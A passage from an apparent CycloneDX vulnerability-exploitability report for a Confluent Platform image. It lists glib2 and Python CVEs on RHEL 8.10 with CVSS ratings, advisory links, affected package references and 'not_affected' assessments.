          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1485",
      "ratings": [
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        124
      ],
      "description": "A flaw was found in Glib's content type parsing logic. This buffer underflow vulnerability occurs because the length of a header line is stored in a signed integer, which can lead to integer wraparound for very large inputs. This results in pointer underflow and out-of-bounds memory access. Exploitation requires a local user to install or process a specially crafted treemagic file, which can lead to local denial of service or application instability.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1485"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1485"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1485"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433325"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-hui7k8rsmbsl.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3871"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1485"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1485"
        }
      ],
      "published": "2026-01-27T14:15:56+00:00",
      "updated": "2026-06-17T10:15:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1489",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "A flaw was found in GLib. An integer overflow vulnerability in its Unicode case conversion implementation can lead to memory corruption. By processing specially crafted and extremely large Unicode strings, an attacker could trigger an undersized memory allocation, resulting in out-of-bounds writes. This could cause applications utilizing GLib for string conversion to crash or become unstable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1489"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1489"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1489"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433348"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-h6zf92f0298p.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3872"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1489"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1489"
        }
      ],
      "published": "2026-01-27T15:15:57+00:00",
      "updated": "2026-06-17T10:15:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1502",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1502"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1502"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69"
        },
        {
          "url": "https://github.com/python/cpython/commit/56b7100b04e44ea27989242b176beb8f016b2c53"
        },
        {
          "url": "https://github.com/python/cpython/commit/58703ec1bdd1eb075e8b01a0c427683ce594dd3e"
        },
        {
          "url": "https://github.com/python/cpython/commit/9e071c9b28c17f347f81b388a003d4eeb3c7a8dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/b1cf9016335cb637c5a425032e8274a224f4b2ed"
        },
        {
          "url": "https://github.com/python/cpython/commit/c00c386faa579ad71196d33408644478488e43ec"
        },
        {
          "url": "https://github.com/python/cpython/issues/146211"
        },
        {
          "url": "https://github.com/python/cpython/pull/146212"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-1502.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1502"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1502"
        }
      ],
      "published": "2026-04-10T18:16:40+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-15028",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
